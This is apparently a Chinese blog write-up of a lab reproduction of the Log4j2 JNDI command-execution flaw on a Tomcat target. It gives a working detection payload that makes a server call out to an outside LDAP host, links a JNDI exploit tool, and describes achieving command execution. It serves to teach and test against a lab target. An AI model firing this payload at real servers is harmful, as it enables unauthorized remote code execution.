渗透测试|迟来的Log4j2命令执行简单复现

TRY 637 2

至少我们曾经在一起过。

来自:一言

前言

最近很火的漏洞,前几天第一时间复现了,今天发文章记录一下.[aru_13]

探测payload:

${jndi:ldap://dnslog.cn/exp}

靶场在下方下载。

环境搭建

1.首先安装tomcat,直接在web管理端部署靶场的war包即可.

渗透测试|迟来的Log4j2命令执行简单复现

2.部署后直接访问根目录即可看到靶场。

渗透测试|迟来的Log4j2命令执行简单复现

漏洞复现

1.直接输入框输入payload即可进行检测,检测的话用dnslog。

渗透测试|迟来的Log4j2命令执行简单复现

2.直接提交后,如果漏洞存在的话dnslog即可收到请求。

渗透测试|迟来的Log4j2命令执行简单复现

命令执行

1.下载jndi注入工具,目前git上大部分都已经删除,找到一个,希望安全自检:https://github.com/Mr-xn/JNDIExploit-1

启动环境

渗透测试|迟来的Log4j2命令执行简单复现

2.burp抓包进行命令执行回显的测试

命令执行成功

渗透测试|迟来的Log4j2命令执行简单复现

 

 

jndi注入工具这边也收到了请求

渗透测试|迟来的Log4j2命令执行简单复现

 

 

3.弹出计算器

渗透测试|迟来的Log4j2命令执行简单复现

靶场下载

下载靶场

发表评论 取消回复
表情 图片 链接 代码

  1. 防水涂料加盟

    感谢分享 赞一个

  2. 古道博客

    太强了,666

分享